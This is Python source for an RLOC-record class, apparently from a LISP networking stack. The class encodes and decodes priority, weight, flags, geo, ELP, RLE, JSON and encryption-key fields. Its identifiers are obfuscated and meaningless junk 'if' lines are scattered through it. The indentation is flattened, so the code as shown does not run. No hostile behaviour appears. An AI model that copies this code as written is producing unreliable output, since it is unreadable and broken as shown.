if 14 - 14: OoO0O00 * OoooooooOO
if 45 - 45: iIii1I11I1II1 * I1IiiI . OoOoOO00
if 97 - 97: I11i % II111iiii % Ii1I . II111iiii . iIii1I11I1II1
if 98 - 98: i11iIiiIii + O0 - O0 - iII111i
if 25 - 25: oO0o / O0 + I1Ii111 % i11iIiiIii / I1IiiI
if 62 - 62: iII111i . I11i * i1IIi + iII111i
if 95 - 95: Ii1I / o0oOOo0O0Ooo % ooOoO0o - I1IiiI / OOooOOo * OOooOOo
if 6 - 6: OoO0O00 % IiII + iIii1I11I1II1
if 18 - 18: II111iiii . Ii1I + OoOoOO00 + O0 - I11i
class lisp_rloc_record ( object ) :
def __init__ ( self ) :
self . priority = 0
self . weight = 0
self . mpriority = 0
self . mweight = 0
self . local_bit = False
self . probe_bit = False
self . reach_bit = False
self . rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . geo = None
self . elp = None
self . rle = None
self . json = None
self . rloc_name = None
self . keys = None
if 30 - 30: II111iiii
if 26 - 26: I11i - i1IIi - Oo0Ooo * O0 * OOooOOo . OoooooooOO
def print_rloc_name ( self , cour = False ) :
if ( self . rloc_name == None ) : return ( "" )
oOo = self . rloc_name
if ( cour ) : oOo = lisp_print_cour ( oOo )
return ( 'rloc-name: {}' . format ( blue ( oOo , cour ) ) )
if 41 - 41: OOooOOo . iIii1I11I1II1 + ooOoO0o * I1Ii111 % i1IIi
if 17 - 17: OoO0O00
def print_record ( self , indent ) :
IIIOo0O = self . print_rloc_name ( )
if ( IIIOo0O != "" ) : IIIOo0O = ", " + IIIOo0O
oOIIi = ""
if ( self . geo ) :
ooO0o = ""
if ( self . geo . geo_name ) : ooO0o = "'{}' " . format ( self . geo . geo_name )
oOIIi = ", geo: {}{}" . format ( ooO0o , self . geo . print_geo ( ) )
if 3 - 3: o0oOOo0O0Ooo
iIII1Iiii = ""
if ( self . elp ) :
ooO0o = ""
if ( self . elp . elp_name ) : ooO0o = "'{}' " . format ( self . elp . elp_name )
iIII1Iiii = ", elp: {}{}" . format ( ooO0o , self . elp . print_elp ( True ) )
if 2 - 2: Ii1I . iII111i + OoOoOO00 / IiII - I1IiiI % I1IiiI
IIIi1iI1 = ""
if ( self . rle ) :
ooO0o = ""
if ( self . rle . rle_name ) : ooO0o = "'{}' " . format ( self . rle . rle_name )
IIIi1iI1 = ", rle: {}{}" . format ( ooO0o , self . rle . print_rle ( False ,
True ) )
if 21 - 21: OOooOOo % O0 / I11i
IiiiIiii = ""
if ( self . json ) :
ooO0o = ""
if ( self . json . json_name ) :
ooO0o = "'{}' " . format ( self . json . json_name )
if 76 - 76: i1IIi
IiiiIiii = ", json: {}" . format ( self . json . print_json ( False ) )
if 38 - 38: I1IiiI
if 15 - 15: o0oOOo0O0Ooo
ooOoOO0Oo0oO0o = ""
if ( self . rloc . is_null ( ) == False and self . keys and self . keys [ 1 ] ) :
ooOoOO0Oo0oO0o = ", " + self . keys [ 1 ] . print_keys ( )
if 94 - 94: Oo0Ooo / I11i . I1ii11iIi11i
if 31 - 31: i11iIiiIii + iIii1I11I1II1 . II111iiii
IiiiI1 = ( "{}RLOC-record -> flags: {}, {}/{}/{}/{}, afi: {}, rloc: "
+ "{}{}{}{}{}{}{}" )
lprint ( IiiiI1 . format ( indent , self . print_flags ( ) , self . priority ,
self . weight , self . mpriority , self . mweight , self . rloc . afi ,
red ( self . rloc . print_address_no_iid ( ) , False ) , IIIOo0O , oOIIi ,
iIII1Iiii , IIIi1iI1 , IiiiIiii , ooOoOO0Oo0oO0o ) )
if 72 - 72: I1Ii111 * OoO0O00 + Oo0Ooo / Ii1I % OOooOOo
if 84 - 84: OoOoOO00 / o0oOOo0O0Ooo
def print_flags ( self ) :
return ( "{}{}{}" . format ( "L" if self . local_bit else "l" , "P" if self . probe_bit else "p" , "R" if self . reach_bit else "r" ) )
if 9 - 9: Ii1I
if 76 - 76: I1IiiI % Oo0Ooo / iIii1I11I1II1 - Oo0Ooo
if 34 - 34: OoOoOO00 - i1IIi + OOooOOo + Ii1I . o0oOOo0O0Ooo
def store_rloc_entry ( self , rloc_entry ) :
iIIiI11 = rloc_entry . rloc if ( rloc_entry . translated_rloc . is_null ( ) ) else rloc_entry . translated_rloc
if 45 - 45: Oo0Ooo . i1IIi
self . rloc . copy_address ( iIIiI11 )
if 10 - 10: OoOoOO00 * ooOoO0o / iIii1I11I1II1 . OOooOOo
if ( rloc_entry . rloc_name ) :
self . rloc_name = rloc_entry . rloc_name
if 93 - 93: Oo0Ooo / II111iiii . Oo0Ooo + i1IIi + i1IIi
if 30 - 30: OoOoOO00 . OOooOOo % OOooOOo / II111iiii + i1IIi
if ( rloc_entry . geo ) :
self . geo = rloc_entry . geo
else :
ooO0o = rloc_entry . geo_name
if ( ooO0o and ooO0o in lisp_geo_list ) :
self . geo = lisp_geo_list [ ooO0o ]
if 61 - 61: i1IIi % II111iiii * II111iiii . o0oOOo0O0Ooo / I1ii11iIi11i - I1Ii111
if 93 - 93: Ii1I - i1IIi
if ( rloc_entry . elp ) :
self . elp = rloc_entry . elp
else :
ooO0o = rloc_entry . elp_name
if ( ooO0o and ooO0o in lisp_elp_list ) :
self . elp = lisp_elp_list [ ooO0o ]
if 3 - 3: oO0o + OoO0O00 - iII111i / Ii1I
if 58 - 58: Ii1I * I11i
if ( rloc_entry . rle ) :
self . rle = rloc_entry . rle
else :
ooO0o = rloc_entry . rle_name
if ( ooO0o and ooO0o in lisp_rle_list ) :
self . rle = lisp_rle_list [ ooO0o ]
if 95 - 95: oO0o
if 49 - 49: I1IiiI
if ( rloc_entry . json ) :
self . json = rloc_entry . json
else :
ooO0o = rloc_entry . json_name
if ( ooO0o and ooO0o in lisp_json_list ) :
self . json = lisp_json_list [ ooO0o ]
if 23 - 23: I1Ii111
if 5 - 5: I1ii11iIi11i % OoOoOO00 . OoooooooOO . o0oOOo0O0Ooo + i11iIiiIii
self . priority = rloc_entry . priority
self . weight = rloc_entry . weight
self . mpriority = rloc_entry . mpriority
self . mweight = rloc_entry . mweight
if 54 - 54: ooOoO0o - O0 + iII111i
if 34 - 34: Ii1I - OOooOOo % iII111i
def encode_json ( self , lisp_json ) :
OoOo00OO0o00 = lisp_json . json_string
iIii1iii1 = 0
if ( lisp_json . json_encrypted ) :
iIii1iii1 = ( lisp_json . json_key_id << 5 ) | 0x02
if 80 - 80: I11i + o0oOOo0O0Ooo - I1Ii111 . OoO0O00 * oO0o + OOooOOo
if 96 - 96: i1IIi + i1IIi * I1ii11iIi11i . Oo0Ooo * Oo0Ooo
ooOoOoOo = LISP_LCAF_JSON_TYPE
ii1 = socket . htons ( LISP_AFI_LCAF )
OoOOo0Oo0o0 = self . rloc . addr_length ( ) + 2
if 72 - 72: O0 * I1Ii111 - iIii1I11I1II1 % i1IIi
iIIIi1Iii1 = socket . htons ( len ( OoOo00OO0o00 ) + OoOOo0Oo0o0 )
if 83 - 83: OoOoOO00 + OOooOOo / OoooooooOO
oOoOOOo0oo = socket . htons ( len ( OoOo00OO0o00 ) )
Oo00oo = struct . pack ( "HBBBBHH" , ii1 , 0 , 0 , ooOoOoOo , iIii1iii1 ,
iIIIi1Iii1 , oOoOOOo0oo )
Oo00oo += OoOo00OO0o00 . encode ( )
if 39 - 39: OoO0O00 % iII111i . oO0o . II111iiii - i11iIiiIii
if 85 - 85: O0 - OoOoOO00
if 17 - 17: o0oOOo0O0Ooo / i1IIi / OOooOOo
if 91 - 91: I1ii11iIi11i / Ii1I - OoOoOO00 . I11i / oO0o
if ( lisp_is_json_telemetry ( OoOo00OO0o00 ) ) :
Oo00oo += struct . pack ( "H" , socket . htons ( self . rloc . afi ) )
Oo00oo += self . rloc . pack_address ( )
else :
Oo00oo += struct . pack ( "H" , 0 )
if 16 - 16: IiII % iII111i . oO0o . I1IiiI % O0 * I11i
return ( Oo00oo )
if 99 - 99: OoOoOO00 / OoooooooOO + iII111i * I11i * i11iIiiIii + OOooOOo
if 40 - 40: II111iiii / I11i % I1IiiI - O0
def encode_lcaf ( self ) :
ii1 = socket . htons ( LISP_AFI_LCAF )
Ii1IIII1i = b""
if ( self . geo ) :
Ii1IIII1i = self . geo . encode_geo ( )
if 59 - 59: IiII / OoOoOO00 - I1Ii111 - ooOoO0o . oO0o
if 87 - 87: oO0o + I1IiiI * I1Ii111 * o0oOOo0O0Ooo + O0
I1IIiIi = b""
if ( self . elp ) :
iiII11iI11i1I = b""
for oo0o in self . elp . elp_nodes :
i1I1iiiI = socket . htons ( oo0o . address . afi )
Ooo0000o = 0
if ( oo0o . eid ) : Ooo0000o |= 0x4
if ( oo0o . probe ) : Ooo0000o |= 0x2
if ( oo0o . strict ) : Ooo0000o |= 0x1
Ooo0000o = socket . htons ( Ooo0000o )
iiII11iI11i1I += struct . pack ( "HH" , Ooo0000o , i1I1iiiI )
iiII11iI11i1I += oo0o . address . pack_address ( )
if 55 - 55: II111iiii / ooOoO0o / II111iiii * OOooOOo
if 67 - 67: II111iiii
OOii1II1IiIIiI = socket . htons ( len ( iiII11iI11i1I ) )
I1IIiIi = struct . pack ( "HBBBBH" , ii1 , 0 , 0 , LISP_LCAF_ELP_TYPE ,
0 , OOii1II1IiIIiI )
I1IIiIi += iiII11iI11i1I
if 20 - 20: IiII % I1IiiI + iIii1I11I1II1 % iII111i
if 100 - 100: o0oOOo0O0Ooo - Oo0Ooo % I1Ii111 . i11iIiiIii % OoooooooOO
II1i = b""
if ( self . rle ) :
oOO0Oo = b""
for iIIi in self . rle . rle_nodes :
i1I1iiiI = socket . htons ( iIIi . address . afi )
oOO0Oo += struct . pack ( "HBBH" , 0 , 0 , iIIi . level , i1I1iiiI )
oOO0Oo += iIIi . address . pack_address ( )
if ( iIIi . rloc_name ) :
oOO0Oo += struct . pack ( "H" , socket . htons ( LISP_AFI_NAME ) )
oOO0Oo += ( iIIi . rloc_name + "\0" ) . encode ( )
if 7 - 7: OoooooooOO % iII111i % Ii1I % II111iiii / oO0o
if 15 - 15: OoO0O00
if 18 - 18: OoooooooOO / OOooOOo % i1IIi - i1IIi / Oo0Ooo
O0ooO0 = socket . htons ( len ( oOO0Oo ) )
II1i = struct . pack ( "HBBBBH" , ii1 , 0 , 0 , LISP_LCAF_RLE_TYPE ,
0 , O0ooO0 )
II1i += oOO0Oo
if 82 - 82: I1ii11iIi11i / Oo0Ooo
if 63 - 63: I1IiiI
i1II11 = b""
if ( self . json ) :
i1II11 = self . encode_json ( self . json )
if 64 - 64: ooOoO0o % IiII - iII111i * i1IIi * I1Ii111 + IiII
if 43 - 43: O0 / IiII
i1Ii11I = b""
if ( self . rloc . is_null ( ) == False and self . keys and self . keys [ 1 ] ) :
i1Ii11I = self . keys [ 1 ] . encode_lcaf ( self . rloc )
if 14 - 14: I1Ii111 + I11i * OoO0O00 - Oo0Ooo
if 97 - 97: oO0o - i11iIiiIii / I11i
I11Ii1I1i = b""
if ( self . rloc_name ) :
I11Ii1I1i += struct . pack ( "H" , socket . htons ( LISP_AFI_NAME ) )
I11Ii1I1i += ( self . rloc_name + "\0" ) . encode ( )
if 97 - 97: Ii1I - ooOoO0o
if 94 - 94: OoOoOO00 + OoO0O00 + I1IiiI
oOooOoO0oo = len ( Ii1IIII1i ) + len ( I1IIiIi ) + len ( II1i ) + len ( i1Ii11I ) + 2 + len ( i1II11 ) + self . rloc . addr_length ( ) + len ( I11Ii1I1i )
if 21 - 21: oO0o - o0oOOo0O0Ooo + ooOoO0o . I1IiiI * oO0o * Ii1I
oOooOoO0oo = socket . htons ( oOooOoO0oo )
IiIi11iiIi1 = struct . pack ( "HBBBBHH" , ii1 , 0 , 0 , LISP_LCAF_AFI_LIST_TYPE ,
0 , oOooOoO0oo , socket . htons ( self . rloc . afi ) )
IiIi11iiIi1 += self . rloc . pack_address ( )
return ( IiIi11iiIi1 + I11Ii1I1i + Ii1IIII1i + I1IIiIi + II1i + i1Ii11I + i1II11 )
if 54 - 54: OoO0O00 / I1IiiI
if 4 - 4: O0
def encode ( self ) :
Ooo0000o = 0
if ( self . local_bit ) : Ooo0000o |= 0x0004
if ( self . probe_bit ) : Ooo0000o |= 0x0002
if ( self . reach_bit ) : Ooo0000o |= 0x0001
if 87 - 87: IiII - OoO0O00 * Oo0Ooo / o0oOOo0O0Ooo % oO0o % Ii1I
Oo00oo = struct . pack ( "BBBBHH" , self . priority , self . weight ,
self . mpriority , self . mweight , socket . htons ( Ooo0000o ) ,
socket . htons ( self . rloc . afi ) )
if 25 - 25: Ii1I - I1ii11iIi11i + Oo0Ooo . I1IiiI
if ( self . geo or self . elp or self . rle or self . keys or self . rloc_name or self . json ) :
if 36 - 36: iII111i
try :
Oo00oo = Oo00oo [ 0 : - 2 ] + self . encode_lcaf ( )
except :
lprint ( "Could not encode LCAF for RLOC-record" )
if 3 - 3: Ii1I
else :
Oo00oo += self . rloc . pack_address ( )
if 44 - 44: O0 - oO0o % II111iiii . I1Ii111
return ( Oo00oo )
if 86 - 86: IiII
if 71 - 71: Ii1I - i1IIi . I1IiiI
def decode_lcaf ( self , packet , nonce , ms_json_encrypt ) :
iiII1iiI = "HBBBBH"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( None )
if 15 - 15: i1IIi % II111iiii / II111iiii - I1ii11iIi11i - I11i % i1IIi
i1I1iiiI , Ii1Ii1Ii , Ooo0000o , ooOoOoOo , ii11Ii1111 , iIIIi1Iii1 = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] )
if 54 - 54: i1IIi . OoO0O00 + iII111i + OoO0O00 * i1IIi
if 13 - 13: Oo0Ooo / OoO0O00 + OOooOOo
iIIIi1Iii1 = socket . ntohs ( iIIIi1Iii1 )
packet = packet [ ooo0000oo0 : : ]
if ( iIIIi1Iii1 > len ( packet ) ) : return ( None )
if 90 - 90: OoO0O00 * i11iIiiIii / oO0o
if 91 - 91: iII111i - OoOoOO00 / Oo0Ooo % II111iiii / II111iiii / o0oOOo0O0Ooo
if 34 - 34: OoO0O00 * II111iiii + i11iIiiIii % Ii1I
if 25 - 25: OoOoOO00 + IiII . i11iIiiIii
if ( ooOoOoOo == LISP_LCAF_AFI_LIST_TYPE ) :
while ( iIIIi1Iii1 > 0 ) :
iiII1iiI = "H"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( iIIIi1Iii1 < ooo0000oo0 ) : return ( None )
if 87 - 87: I1IiiI + OoooooooOO + O0
oo = len ( packet )
i1I1iiiI = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] ) [ 0 ]
i1I1iiiI = socket . ntohs ( i1I1iiiI )
if 32 - 32: Ii1I / I1ii11iIi11i . Ii1I
if ( i1I1iiiI == LISP_AFI_LCAF ) :
packet = self . decode_lcaf ( packet , nonce , ms_json_encrypt )
if ( packet == None ) : return ( None )
else :
packet = packet [ ooo0000oo0 : : ]
self . rloc_name = None
if ( i1I1iiiI == LISP_AFI_NAME ) :
packet , oOo = lisp_decode_dist_name ( packet )
self . rloc_name = oOo
else :
self . rloc . afi = i1I1iiiI
packet = self . rloc . unpack_address ( packet )
if ( packet == None ) : return ( None )
self . rloc . mask_len = self . rloc . host_mask_len ( )
if 65 - 65: IiII
if 74 - 74: Oo0Ooo + i1IIi - II111iiii / ooOoO0o / iII111i
if 66 - 66: ooOoO0o / IiII * iIii1I11I1II1
iIIIi1Iii1 -= oo - len ( packet )
if 42 - 42: I1Ii111 - i11iIiiIii % II111iiii * ooOoO0o . O0 % I11i
if 82 - 82: Oo0Ooo % O0 + I1ii11iIi11i % I1ii11iIi11i
elif ( ooOoOoOo == LISP_LCAF_GEO_COORD_TYPE ) :
if 74 - 74: O0 * IiII . I11i - I1Ii111 + O0 + I11i
if 48 - 48: oO0o . o0oOOo0O0Ooo - OOooOOo
if 29 - 29: Oo0Ooo - Ii1I - Oo0Ooo
if 89 - 89: Oo0Ooo . OoO0O00 . I1ii11iIi11i * oO0o . O0
Ooo0O00o00 = lisp_geo ( "" )
packet = Ooo0O00o00 . decode_geo ( packet , iIIIi1Iii1 , ii11Ii1111 )
if ( packet == None ) : return ( None )
self . geo = Ooo0O00o00
if 63 - 63: O0 * O0 . IiII
elif ( ooOoOoOo == LISP_LCAF_JSON_TYPE ) :
oo0oO = ii11Ii1111 & 0x02
if 10 - 10: I1IiiI % II111iiii / I1IiiI
if 13 - 13: II111iiii - i11iIiiIii
if 90 - 90: I11i . OoOoOO00 % Oo0Ooo / I1Ii111 . Ii1I % OoO0O00
if 32 - 32: I1IiiI + ooOoO0o / O0 * i11iIiiIii % Oo0Ooo + II111iiii
iiII1iiI = "H"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( iIIIi1Iii1 < ooo0000oo0 ) : return ( None )
if 95 - 95: iII111i / ooOoO0o + I1Ii111
oOoOOOo0oo = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] ) [ 0 ]
oOoOOOo0oo = socket . ntohs ( oOoOOOo0oo )
if ( iIIIi1Iii1 < ooo0000oo0 + oOoOOOo0oo ) : return ( None )
if 78 - 78: iIii1I11I1II1 / I1IiiI - IiII
packet = packet [ ooo0000oo0 : : ]
self . json = lisp_json ( "" , packet [ 0 : oOoOOOo0oo ] , oo0oO ,
ms_json_encrypt )
packet = packet [ oOoOOOo0oo : : ]
if 81 - 81: I1ii11iIi11i
if 31 - 31: O0 % ooOoO0o / I1IiiI * iII111i % iIii1I11I1II1 * OoOoOO00
if 76 - 76: I1Ii111 - O0
if 23 - 23: O0 * Ii1I * ooOoO0o % ooOoO0o
i1I1iiiI = socket . ntohs ( struct . unpack ( "H" , packet [ : 2 ] ) [ 0 ] )
packet = packet [ 2 : : ]
if 7 - 7: II111iiii + I11i
if ( i1I1iiiI != 0 and lisp_is_json_telemetry ( self . json . json_string ) ) :
self . rloc . afi = i1I1iiiI
packet = self . rloc . unpack_address ( packet )
if 99 - 99: iIii1I11I1II1 * oO0o
if 37 - 37: ooOoO0o * iII111i * I11i
elif ( ooOoOoOo == LISP_LCAF_ELP_TYPE ) :
if 11 - 11: I1IiiI
if 48 - 48: O0 . I11i
if 9 - 9: oO0o / Oo0Ooo
if 85 - 85: i11iIiiIii / I1IiiI . OoO0O00 . I11i . oO0o * IiII
I1iI1 = lisp_elp ( None )
I1iI1 . elp_nodes = [ ]
while ( iIIIi1Iii1 > 0 ) :
Ooo0000o , i1I1iiiI = struct . unpack ( "HH" , packet [ : 4 ] )
if 44 - 44: ooOoO0o / Ii1I / OoooooooOO % iIii1I11I1II1 - I1Ii111
i1I1iiiI = socket . ntohs ( i1I1iiiI )
if ( i1I1iiiI == LISP_AFI_LCAF ) : return ( None )
if 86 - 86: O0 + O0 / I11i - iIii1I11I1II1
oo0o = lisp_elp_node ( )
I1iI1 . elp_nodes . append ( oo0o )
if 42 - 42: OOooOOo
Ooo0000o = socket . ntohs ( Ooo0000o )
oo0o . eid = ( Ooo0000o & 0x4 )
oo0o . probe = ( Ooo0000o & 0x2 )
oo0o . strict = ( Ooo0000o & 0x1 )
oo0o . address . afi = i1I1iiiI
oo0o . address . mask_len = oo0o . address . host_mask_len ( )
packet = oo0o . address . unpack_address ( packet [ 4 : : ] )
iIIIi1Iii1 -= oo0o . address . addr_length ( ) + 4
if 39 - 39: O0 % Ii1I . I11i * o0oOOo0O0Ooo
I1iI1 . select_elp_node ( )
self . elp = I1iI1
if 14 - 14: I11i . iIii1I11I1II1 + I1Ii111 % OoooooooOO
elif ( ooOoOoOo == LISP_LCAF_RLE_TYPE ) :
if 9 - 9: oO0o + Ii1I / I1ii11iIi11i * iIii1I11I1II1 + o0oOOo0O0Ooo
if 64 - 64: I11i % i11iIiiIii % I1ii11iIi11i
if 14 - 14: I1Ii111 - OoOoOO00 - I1ii11iIi11i % I11i + OoooooooOO
if 4 - 4: I1Ii111 - I1IiiI / iIii1I11I1II1 + I1ii11iIi11i % iIii1I11I1II1 * I1IiiI
ooo0o0O = lisp_rle ( None )
ooo0o0O . rle_nodes = [ ]
while ( iIIIi1Iii1 > 0 ) :
Oo0OoO00O , ii1I1I1iII , ii11i , i1I1iiiI = struct . unpack ( "HBBH" , packet [ : 6 ] )
if 42 - 42: OoOoOO00 / iII111i + OOooOOo
i1I1iiiI = socket . ntohs ( i1I1iiiI )
if ( i1I1iiiI == LISP_AFI_LCAF ) : return ( None )
if 61 - 61: i11iIiiIii % oO0o * ooOoO0o
iIIi = lisp_rle_node ( )
ooo0o0O . rle_nodes . append ( iIIi )
if 59 - 59: OOooOOo + i1IIi
iIIi . level = ii11i
iIIi . address . afi = i1I1iiiI
iIIi . address . mask_len = iIIi . address . host_mask_len ( )
packet = iIIi . address . unpack_address ( packet [ 6 : : ] )
if 10 - 10: Oo0Ooo - i1IIi % I1ii11iIi11i
iIIIi1Iii1 -= iIIi . address . addr_length ( ) + 6
if ( iIIIi1Iii1 >= 2 ) :
i1I1iiiI = struct . unpack ( "H" , packet [ : 2 ] ) [ 0 ]
if ( socket . ntohs ( i1I1iiiI ) == LISP_AFI_NAME ) :
packet = packet [ 2 : : ]
packet , iIIi . rloc_name = lisp_decode_dist_name ( packet )
if 54 - 54: IiII + OOooOOo + oO0o * O0 % ooOoO0o + OoO0O00
if ( packet == None ) : return ( None )
iIIIi1Iii1 -= len ( iIIi . rloc_name ) + 1 + 2
if 13 - 13: i11iIiiIii * O0 . OoooooooOO % I1Ii111 + I1ii11iIi11i + OOooOOo
if 45 - 45: oO0o % i11iIiiIii / Ii1I / IiII % Ii1I - Ii1I
if 73 - 73: I1ii11iIi11i * I1ii11iIi11i / II111iiii % iII111i
self . rle = ooo0o0O
self . rle . build_forwarding_list ( )
if 74 - 74: OoO0O00 / I1ii11iIi11i - ooOoO0o * i1IIi + I1ii11iIi11i . I11i
elif ( ooOoOoOo == LISP_LCAF_SECURITY_TYPE ) :
if 13 - 13: iII111i + o0oOOo0O0Ooo / iII111i - Ii1I - iII111i
if 34 - 34: IiII . OOooOOo + OOooOOo - OoooooooOO * I1Ii111
if 72 - 72: iIii1I11I1II1 % i1IIi / OoO0O00 / I1IiiI - II111iiii - I1Ii111
if 43 - 43: o0oOOo0O0Ooo - Oo0Ooo - I1ii11iIi11i / II111iiii + I1IiiI / I1ii11iIi11i
if 34 - 34: Oo0Ooo
i1o0o0oOO = packet
iIiiIi1111ii = lisp_keys ( 1 )
packet = iIiiIi1111ii . decode_lcaf ( i1o0o0oOO , iIIIi1Iii1 )
if ( packet == None ) : return ( None )
if 21 - 21: I1IiiI / I1IiiI % I1Ii111 - OoOoOO00 % OoOoOO00 - II111iiii
if 97 - 97: oO0o
if 98 - 98: I1Ii111 * I1IiiI + iIii1I11I1II1
if 75 - 75: oO0o
OoOO0Ooo = [ LISP_CS_25519_CBC , LISP_CS_25519_CHACHA ]
if ( iIiiIi1111ii . cipher_suite in OoOO0Ooo ) :
if ( iIiiIi1111ii . cipher_suite == LISP_CS_25519_CBC ) :
III = lisp_keys ( 1 , do_poly = False , do_chacha = False )
if 50 - 50: oO0o / Oo0Ooo
if ( iIiiIi1111ii . cipher_suite == LISP_CS_25519_CHACHA ) :
III = lisp_keys ( 1 , do_poly = True , do_chacha = True )
if 32 - 32: OoO0O00 % oO0o * I1ii11iIi11i + I11i / I1Ii111
else :
III = lisp_keys ( 1 , do_poly = False , do_chacha = False )
if 5 - 5: o0oOOo0O0Ooo + iII111i / OoooooooOO + Ii1I . OoOoOO00 / oO0o
packet = III . decode_lcaf ( i1o0o0oOO , iIIIi1Iii1 )
if ( packet == None ) : return ( None )
if 18 - 18: II111iiii . o0oOOo0O0Ooo
if ( len ( packet ) < 2 ) : return ( None )
i1I1iiiI = struct . unpack ( "H" , packet [ : 2 ] ) [ 0 ]
self . rloc . afi = socket . ntohs ( i1I1iiiI )
if ( len ( packet ) < self . rloc . addr_length ( ) ) : return ( None )
packet = self . rloc . unpack_address ( packet [ 2 : : ] )
if ( packet == None ) : return ( None )
self . rloc . mask_len = self . rloc . host_mask_len ( )
if 75 - 75: OoooooooOO - Oo0Ooo
if 56 - 56: II111iiii - i11iIiiIii - oO0o . o0oOOo0O0Ooo
if 4 - 4: i1IIi
if 91 - 91: IiII . OoO0O00 * Ii1I / o0oOOo0O0Ooo
if 41 - 41: I1IiiI . OoO0O00 / i1IIi . Oo0Ooo . oO0o
if 44 - 44: iII111i * I11i + i11iIiiIii + i1IIi / IiII * II111iiii
if ( self . rloc . is_null ( ) ) : return ( packet )
if 58 - 58: OOooOOo
OOO00O = self . rloc_name
if ( OOO00O ) : OOO00O = blue ( self . rloc_name , False )
if 5 - 5: I1Ii111 * I11i * oO0o * I1ii11iIi11i - OOooOOo * OoOoOO00
if 88 - 88: OoooooooOO . II111iiii / Oo0Ooo * OoOoOO00
if 52 - 52: OoO0O00 + oO0o
if 84 - 84: O0 % I1ii11iIi11i % iIii1I11I1II1 - OoOoOO00 - Oo0Ooo
if 7 - 7: II111iiii % oO0o % i1IIi . iIii1I11I1II1
if 92 - 92: Ii1I / o0oOOo0O0Ooo % OOooOOo - OoOoOO00
I1 = self . keys [ 1 ] if self . keys else None
if ( I1 == None ) :
if ( III . remote_public_key == None ) :
i1i111III1 = bold ( "No remote encap-public-key supplied" , False )
lprint ( " {} for {}" . format ( i1i111III1 , OOO00O ) )
III = None
else :
i1i111III1 = bold ( "New encap-keying with new state" , False )
lprint ( " {} for {}" . format ( i1i111III1 , OOO00O ) )
III . compute_shared_key ( "encap" )
if 44 - 44: I1IiiI + OoOoOO00 * Oo0Ooo
if 31 - 31: I11i - I1IiiI - OoO0O00 * OoOoOO00
if 50 - 50: I1ii11iIi11i + I11i * iII111i
if 27 - 27: OoOoOO00 * OOooOOo * iIii1I11I1II1 / i1IIi
if 60 - 60: OOooOOo * I1Ii111 . oO0o
if 47 - 47: oO0o % OOooOOo / OOooOOo % OoOoOO00 % I1Ii111 / OoOoOO00
if 51 - 51: I1IiiI . I11i - OoOoOO00
if 10 - 10: Oo0Ooo * OOooOOo / IiII . o0oOOo0O0Ooo
if 97 - 97: Ii1I . Ii1I % iII111i
if 49 - 49: Oo0Ooo % OOooOOo - OoooooooOO + IiII
if ( I1 ) :
if ( III . remote_public_key == None ) :
III = None
oO = bold ( "Remote encap-unkeying occurred" , False )
lprint ( " {} for {}" . format ( oO , OOO00O ) )
elif ( I1 . compare_keys ( III ) ) :
III = I1
lprint ( " Maintain stored encap-keys for {}" . format ( OOO00O ) )
if 54 - 54: iIii1I11I1II1 - OoooooooOO / I11i / oO0o % I1IiiI + OoOoOO00
else :
if ( I1 . remote_public_key == None ) :
i1i111III1 = "New encap-keying for existing state"
else :
i1i111III1 = "Remote encap-rekeying"
if 26 - 26: OoO0O00 * II111iiii % OOooOOo * iII111i + iII111i
lprint ( " {} for {}" . format ( bold ( i1i111III1 , False ) ,
OOO00O ) )
I1 . remote_public_key = III . remote_public_key
I1 . compute_shared_key ( "encap" )
III = I1
if 25 - 25: I11i - I1ii11iIi11i
if 100 - 100: I1Ii111 / Ii1I + OoOoOO00 . OoooooooOO
self . keys = [ None , III , None , None ]
if 83 - 83: O0
else :
if 35 - 35: i11iIiiIii - I11i . OoOoOO00 * II111iiii % i11iIiiIii
if 55 - 55: o0oOOo0O0Ooo / O0 / OoooooooOO * Oo0Ooo % iII111i
if 24 - 24: I1ii11iIi11i % OOooOOo + OoooooooOO + OoO0O00
if 100 - 100: Oo0Ooo % OoO0O00 - OoOoOO00
packet = packet [ iIIIi1Iii1 : : ]
if 46 - 46: o0oOOo0O0Ooo
return ( packet )
if 28 - 28: i1IIi
if 81 - 81: oO0o % OoooooooOO . I1Ii111 - OoOoOO00 / I1IiiI
def decode ( self , packet , nonce , ms_json_encrypt = False ) :
iiII1iiI = "BBBBHH"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( None )
if 62 - 62: I1Ii111 * I11i / I11i
self . priority , self . weight , self . mpriority , self . mweight , Ooo0000o , i1I1iiiI = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] )
if 42 - 42: ooOoO0o * ooOoO0o / Ii1I / OOooOOo * OOooOOo
if 92 - 92: Oo0Ooo / iII111i - OoooooooOO - o0oOOo0O0Ooo % ooOoO0o
Ooo0000o = socket . ntohs ( Ooo0000o )
i1I1iiiI = socket . ntohs ( i1I1iiiI )
self . local_bit = True if ( Ooo0000o & 0x0004 ) else False
self . probe_bit = True if ( Ooo0000o & 0x0002 ) else False
self . reach_bit = True if ( Ooo0000o & 0x0001 ) else False
if 35 - 35: i1IIi % iII111i % I11i * iIii1I11I1II1 % Ii1I - Oo0Ooo
if ( i1I1iiiI == LISP_AFI_LCAF ) :
packet = packet [ ooo0000oo0 - 2 : : ]
packet = self . decode_lcaf ( packet , nonce , ms_json_encrypt )
else :
self . rloc . afi = i1I1iiiI
packet = packet [ ooo0000oo0 : : ]
packet = self . rloc . unpack_address ( packet )
if 94 - 94: iII111i
self . rloc . mask_len = self . rloc . host_mask_len ( )
return ( packet )
if 68 - 68: OoooooooOO % OOooOOo / OoooooooOO / I1Ii111 + Ii1I - o0oOOo0O0Ooo
if 81 - 81: I1IiiI
def end_of_rlocs ( self , packet , rloc_count ) :
for iIi1iIIIiIiI in range ( rloc_count ) :
packet = self . decode ( packet , None , False )
if ( packet == None ) : return ( None )
if 62 - 62: Ii1I * OoOoOO00
return ( packet )
if 27 - 27: Oo0Ooo + Oo0Ooo / II111iiii % I1Ii111
if 11 - 11: Ii1I
if 54 - 54: I1IiiI * I1Ii111 / ooOoO0o / iIii1I11I1II1 % iII111i / oO0o
if 11 - 11: ooOoO0o + I1IiiI + Ii1I . II111iiii
if 50 - 50: Oo0Ooo
if 14 - 14: O0
